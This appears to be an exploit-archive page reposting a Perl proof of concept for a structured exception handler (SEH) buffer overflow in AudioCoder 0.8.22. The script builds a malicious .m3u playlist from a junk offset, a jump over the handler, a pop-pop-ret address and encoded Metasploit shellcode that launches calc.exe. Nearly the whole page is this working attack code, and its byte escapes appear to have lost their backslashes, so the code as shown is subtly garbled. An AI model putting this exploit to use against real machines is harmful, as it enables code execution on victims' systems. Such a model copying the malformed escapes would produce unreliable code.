Home / exploitsPDF  

AudioCoder 0.8.22 SEH Buffer Overflow

Posted on 01 November 2013

#!/usr/bin/perl

###############################################################################
# Exploit Title: AudioCoder 0.8.22 (.m3u) - SEH Buffer Overflow
# Date: 10-18-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: AudioCoder 0.8.22 (http://www.mediacoderhq.com/audio/)
# Software Link: http://www.fosshub.com/download/AudioCoder-0.8.22.5506.exe
# Version: 0.8.22.5506
# Tested On: Windows XP SP3
# Creates an .m3u file to exploit a very basic seh bof:
# junk --> next seh (jmp to shellcode) --> seh (pop3 pop ret) --> shellcode
###############################################################################

my $buffsize = 5000; # sets buffer size for consistent sized payload
my $junk = "http://" . ("x90" x 757); # offset to seh overwrite
my $nseh = "xebx14x90x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack('V',0x6601228e); #overwrite seh w/ pop edi pop ebp ret from AudioCoderlibiconv-2.dll
my $nops = "x90" x 20;

# Calc.exe payload [size 227]
# msfpayload windows/exec CMD=calc.exe R |
# msfencode -e x86/shikata_ga_nai -c 1 -b 'x00x0ax0dxff'
my $shell = "xdbxcfxb8x27x17x16x1fxd9x74x24xf4x5fx2bxc9" .
"xb1x33x31x47x17x83xefxfcx03x60x04xf4xeax92" .
"xc2x71x14x6ax13xe2x9cx8fx22x30xfaxc4x17x84" .
"x88x88x9bx6fxdcx38x2fx1dxc9x4fx98xa8x2fx7e" .
"x19x1dxf0x2cxd9x3fx8cx2ex0exe0xadxe1x43xe1" .
"xeax1fxabxb3xa3x54x1ex24xc7x28xa3x45x07x27" .
"x9bx3dx22xf7x68xf4x2dx27xc0x83x66xdfx6axcb" .
"x56xdexbfx0fxaaxa9xb4xe4x58x28x1dx35xa0x1b" .
"x61x9ax9fx94x6cxe2xd8x12x8fx91x12x61x32xa2" .
"xe0x18xe8x27xf5xbax7bx9fxddx3bxafx46x95x37" .
"x04x0cxf1x5bx9bxc1x89x67x10xe4x5dxeex62xc3" .
"x79xabx31x6axdbx11x97x93x3bxfdx48x36x37xef" .
"x9dx40x1ax65x63xc0x20xc0x63xdax2ax62x0cxeb" .
"xa1xedx4bxf4x63x4axa3xbex2exfax2cx67xbbxbf" .
"x30x98x11x83x4cx1bx90x7bxabx03xd1x7exf7x83" .
"x09xf2x68x66x2exa1x89xa3x4dx24x1ax2fxbcxc3" .
"x9axcaxc0";

# fill remainder of buffer with junk chars; not necessary but useful
# to check remaining usable space for different sized payloads
my $fill = "x43" x ($buffsize - (length($junk)+length($nseh)+length($seh)+length($nops)+length($shell))); # fills remainder of buffer

my $buffer = $junk.$nseh.$seh.$nops.$shell.$fill;

# write the exploit buffer to file
my $file = "audiocoder.m3u";
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file created [" . $file . "]
";
print "Buffer size: " . length($buffer) . "
";

 

TOP

Malware :

Exploits :